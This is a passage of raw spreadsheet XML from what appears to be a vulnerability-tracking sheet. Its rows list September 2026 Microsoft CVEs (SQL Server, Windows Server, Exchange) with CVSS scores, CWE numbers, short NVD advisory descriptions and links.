t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1083" s="5" t="inlineStr" /><c r="H1083" s="5" t="n"><v>0.007</v></c><c r="I1083" s="5" t="inlineStr" /><c r="J1083" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1083" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1083" s="5" t="inlineStr" /><c r="M1083" s="5" t="inlineStr" /><c r="N1083" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1083" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1083" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1083" s="5" t="inlineStr" /><c r="R1083" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1083" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1083" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t></is></c></row><row r="1084"><c r="A1084" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1084" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1084" s="5" t="inlineStr"><is><t>CVE-2026-67624</t></is></c><c r="D1084" s="5" t="n"><v>6.5</v></c><c r="E1084" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1084" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1084" s="5" t="inlineStr" /><c r="H1084" s="5" t="n"><v>0.006</v></c><c r="I1084" s="5" t="inlineStr" /><c r="J1084" s="5" t="inlineStr" /><c r="K1084" s="5" t="inlineStr" /><c r="L1084" s="5" t="inlineStr" /><c r="M1084" s="5" t="inlineStr" /><c r="N1084" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1084" s="5" t="inlineStr" /><c r="R1084" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1084" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1084" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67624</t></is></c></row><row r="1085"><c r="A1085" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1085" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1085" s="5" t="inlineStr"><is><t>CVE-2026-67629</t></is></c><c r="D1085" s="5" t="n"><v>6.5</v></c><c r="E1085" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1085" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1085" s="5" t="inlineStr" /><c r="H1085" s="5" t="n"><v>0.007</v></c><c r="I1085" s="5" t="inlineStr" /><c r="J1085" s="5" t="inlineStr" /><c r="K1085" s="5" t="inlineStr" /><c r="L1085" s="5" t="inlineStr" /><c r="M1085" s="5" t="inlineStr" /><c r="N1085" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1085" s="5" t="inlineStr" /><c r="R1085" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1085" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1085" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67629</t></is></c></row><row r="1086"><c r="A1086" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1086" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1086" s="5" t="inlineStr"><is><t>CVE-2026-67630</t></is></c><c r="D1086" s="5" t="n"><v>6.5</v></c><c r="E1086" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1086" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1086" s="5" t="inlineStr" /><c r="H1086" s="5" t="n"><v>0.007</v></c><c r="I1086" s="5" t="inlineStr" /><c r="J1086" s="5" t="inlineStr" /><c r="K1086" s="5" t="inlineStr" /><c r="L1086" s="5" t="inlineStr" /><c r="M1086" s="5" t="inlineStr" /><c r="N1086" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1086" s="5" t="inlineStr" /><c r="R1086" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1086" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1086" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67630</t></is></c></row><row r="1087"><c r="A1087" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1087" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1087" s="5" t="inlineStr"><is><t>CVE-2026-67633</t></is></c><c r="D1087" s="5" t="n"><v>6.5</v></c><c r="E1087" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1087" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1087" s="5" t="inlineStr" /><c r="H1087" s="5" t="n"><v>0.008</v></c><c r="I1087" s="5" t="inlineStr" /><c r="J1087" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1087" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1087" s="5" t="inlineStr" /><c r="M1087" s="5" t="inlineStr" /><c r="N1087" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1087" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1087" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1087" s="5" t="inlineStr" /><c r="R1087" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1087" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1087" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t></is></c></row><row r="1088"><c r="A1088" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1088" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1088" s="5" t="inlineStr"><is><t>CVE-2026-67641</t></is></c><c r="D1088" s="5" t="n"><v>6.5</v></c><c r="E1088" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1088" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1088" s="5" t="inlineStr" /><c r="H1088" s="5" t="n"><v>0.006</v></c><c r="I1088" s="5" t="inlineStr" /><c r="J1088" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1088" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1088" s="5" t="inlineStr" /><c r="M1088" s="5" t="inlineStr" /><c r="N1088" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1088" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1088" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1088" s="5" t="inlineStr" /><c r="R1088" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1088" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1088" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t></is></c></row><row r="1089"><c r="A1089" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1089" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1089" s="5" t="inlineStr"><is><t>CVE-2026-67645</t></is></c><c r="D1089" s="5" t="n"><v>6.5</v></c><c r="E1089" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1089" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1089" s="5" t="inlineStr" /><c r="H1089" s="5" t="n"><v>0.006</v></c><c r="I1089" s="5" t="inlineStr" /><c r="J1089" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1089" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1089" s="5" t="inlineStr" /><c r="M1089" s="5" t="inlineStr" /><c r="N1089" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1089" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1089" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1089" s="5" t="inlineStr" /><c r="R1089" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1089" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1089" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t></is></c></row><row r="1090"><c r="A1090" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1090" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1090" s="5" t="inlineStr"><is><t>CVE-2026-67648</t></is></c><c r="D1090" s="5" t="n"><v>6.5</v></c><c r="E1090" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1090" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1090" s="5" t="inlineStr" /><c r="H1090" s="5" t="n"><v>0.006</v></c><c r="I1090" s="5" t="inlineStr" /><c r="J1090" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1090" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1090" s="5" t="inlineStr" /><c r="M1090" s="5" t="inlineStr" /><c r="N1090" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1090" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1090" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1090" s="5" t="inlineStr" /><c r="R1090" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1090" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1090" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t></is></c></row><row r="1091"><c r="A1091" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1091" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1091" s="5" t="inlineStr"><is><t>CVE-2026-68776</t></is></c><c r="D1091" s="5" t="n"><v>6.5</v></c><c r="E1091" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1091" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1091" s="5" t="inlineStr" /><c r="H1091" s="5" t="n"><v>0.006</v></c><c r="I1091" s="5" t="inlineStr" /><c r="J1091" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1091" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1091" s="5" t="inlineStr" /><c r="M1091" s="5" t="inlineStr" /><c r="N1091" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1091" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1091" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1091" s="5" t="inlineStr" /><c r="R1091" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1091" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1091" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t></is></c></row><row r="1092"><c r="A1092" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1092" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1092" s="5" t="inlineStr"><is><t>CVE-2026-68777</t></is></c><c r="D1092" s="5" t="n"><v>6.5</v></c><c r="E1092" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1092" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1092" s="5" t="inlineStr" /><c r="H1092" s="5" t="n"><v>0.007</v></c><c r="I1092" s="5" t="inlineStr" /><c r="J1092" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1092" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1092" s="5" t="inlineStr" /><c r="M1092" s="5" t="inlineStr" /><c r="N1092" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1092" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1092" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1092" s="5" t="inlineStr" /><c r="R1092" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1092" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1092" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t></is></c></row><row r="1093"><c r="A1093" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1093" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1093" s="5" t="inlineStr"><is><t>CVE-2026-68778</t></is></c><c r="D1093" s="5" t="n"><v>6.5</v></c><c r="E1093" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1093" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1093" s="5" t="inlineStr" /><c r="H1093" s="5" t="n"><v>0.007</v></c><c r="I1093" s="5" t="inlineStr" /><c r="J1093" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1093" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1093" s="5" t="inlineStr" /><c r="M1093" s="5" t="inlineStr" /><c r="N1093" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1093" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1093" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1093" s="5" t="inlineStr" /><c r="R1093" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1093" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1093" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t></is></c></row><row r="1094"><c r="A1094" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1094" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1094" s="5" t="inlineStr"><is><t>CVE-2026-68779</t></is></c><c r="D1094" s="5" t="n"><v>6.5</v></c><c r="E1094" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1094" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1094" s="5" t="inlineStr" /><c r="H1094" s="5" t="n"><v>0.006</v></c><c r="I1094" s="5" t="inlineStr" /><c r="J1094" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1094" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1094" s="5" t="inlineStr" /><c r="M1094" s="5" t="inlineStr" /><c r="N1094" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1094" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1094" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1094" s="5" t="inlineStr" /><c r="R1094" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1094" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1094" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t></is></c></row><row r="1095"><c r="A1095" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1095" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1095" s="5" t="inlineStr"><is><t>CVE-2026-68780</t></is></c><c r="D1095" s="5" t="n"><v>6.5</v></c><c r="E1095" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1095" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1095" s="5" t="inlineStr" /><c r="H1095" s="5" t="n"><v>0.007</v></c><c r="I1095" s="5" t="inlineStr" /><c r="J1095" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1095" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1095" s="5" t="inlineStr" /><c r="M1095" s="5" t="inlineStr" /><c r="N1095" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1095" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1095" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1095" s="5" t="inlineStr" /><c r="R1095" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1095" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1095" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t></is></c></row><row r="1096"><c r="A1096" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1096" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1096" s="5" t="inlineStr"><is><t>CVE-2026-68781</t></is></c><c r="D1096" s="5" t="n"><v>6.5</v></c><c r="E1096" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1096" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1096" s="5" t="inlineStr" /><c r="H1096" s="5" t="n"><v>0.007</v></c><c r="I1096" s="5" t="inlineStr" /><c r="J1096" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1096" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1096" s="5" t="inlineStr" /><c r="M1096" s="5" t="inlineStr" /><c r="N1096" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1096" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1096" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1096" s="5" t="inlineStr" /><c r="R1096" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1096" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1096" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t></is></c></row><row r="1097"><c r="A1097" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1097" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1097" s="5" t="inlineStr"><is><t>CVE-2026-68784</t></is></c><c r="D1097" s="5" t="n"><v>6.5</v></c><c r="E1097" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1097" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1097" s="5" t="inlineStr" /><c r="H1097" s="5" t="n"><v>0.007</v></c><c r="I1097" s="5" t="inlineStr" /><c r="J1097" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1097" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1097" s="5" t="inlineStr" /><c r="M1097" s="5" t="inlineStr" /><c r="N1097" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1097" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1097" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1097" s="5" t="inlineStr" /><c r="R1097" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1097" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1097" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t></is></c></row><row r="1098"><c r="A1098" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1098" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1098" s="5" t="inlineStr"><is><t>CVE-2026-68898</t></is></c><c r="D1098" s="5" t="n"><v>6.5</v></c><c r="E1098" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1098" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1098" s="5" t="inlineStr" /><c r="H1098" s="5" t="n"><v>0.006</v></c><c r="I1098" s="5" t="inlineStr" /><c r="J1098" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K109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98" s="5" t="inlineStr" /><c r="M1098" s="5" t="inlineStr" /><c r="N1098" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1098" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1098" s="5" t="inlineStr" /><c r="R1098" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1098" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1098" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t></is></c></row><row r="1099"><c r="A1099" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1099" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1099" s="5" t="inlineStr"><is><t>CVE-2026-69267</t></is></c><c r="D1099" s="5" t="n"><v>6.5</v></c><c r="E1099" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1099" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1099" s="5" t="inlineStr" /><c r="H1099" s="5" t="n"><v>0.003</v></c><c r="I1099" s="5" t="inlineStr" /><c r="J1099" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1099"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99" s="5" t="inlineStr" /><c r="M1099" s="5" t="inlineStr" /><c r="N1099" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1099" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1099" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1099" s="5" t="inlineStr" /><c r="R1099" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1099" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t></is></c><c r="T1099" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t></is></c></row><row r="1100"><c r="A1100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1100" s="5" t="inlineStr"><is><t>CVE-2026-69297</t></is></c><c r="D1100" s="5" t="n"><v>6.5</v></c><c r="E1100" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1100" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1100" s="5" t="inlineStr" /><c r="H1100" s="5" t="n"><v>0.006</v></c><c r="I1100" s="5" t="inlineStr" /><c r="J1100" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1100" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1100" s="5" t="inlineStr" /><c r="M1100" s="5" t="inlineStr" /><c r="N1100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1100" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1100" s="5" t="inlineStr" /><c r="R1100" s="5" t="inlineStr"><is><t>CWE-257</t></is></c><c r="S1100" s="5" t="inlineStr"><is><t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t></is></c></row><row r="1101"><c r="A1101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1101" s="5" t="inlineStr"><is><t>CVE-2026-69361</t></is></c><c r="D1101" s="5" t="n"><v>6.5</v></c><c r="E1101" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1101" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1101" s="5" t="inlineStr" /><c r="H1101" s="5" t="n"><v>0.008</v></c><c r="I1101" s="5" t="inlineStr" /><c r="J1101" s="5" t="inlineStr" /><c r="K1101" s="5" t="inlineStr" /><c r="L1101" s="5" t="inlineStr" /><c r="M1101" s="5" t="inlineStr" /><c r="N1101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1101" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1101" s="5" t="inlineStr" /><c r="R1101" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1101" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69361</t></is></c></row><row r="1102"><c r="A1102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1102" s="5" t="inlineStr"><is><t>CVE-2026-69374</t></is></c><c r="D1102" s="5" t="n"><v>6.5</v></c><c r="E1102" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1102" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1102" s="5" t="inlineStr" /><c r="H1102" s="5" t="n"><v>0.011</v></c><c r="I1102" s="5" t="inlineStr" /><c r="J1102" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1102" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1102" s="5" t="inlineStr" /><c r="M1102" s="5" t="inlineStr" /><c r="N1102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1102" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1102" s="5" t="inlineStr" /><c r="R1102" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1102" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t></is></c></row><row r="1103"><c r="A1103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1103" s="5" t="inlineStr"><is><t>CVE-2026-69375</t></is></c><c r="D1103" s="5" t="n"><v>6.5</v></c><c r="E1103" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1103" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1103" s="5" t="inlineStr" /><c r="H1103" s="5" t="n"><v>0.006</v></c><c r="I1103" s="5" t="inlineStr" /><c r="J1103" s="5" t="inlineStr" /><c r="K1103" s="5" t="inlineStr" /><c r="L1103" s="5" t="inlineStr" /><c r="M1103" s="5" t="inlineStr" /><c r="N1103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1103" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1103" s="5" t="inlineStr" /><c r="R1103" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1103" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a 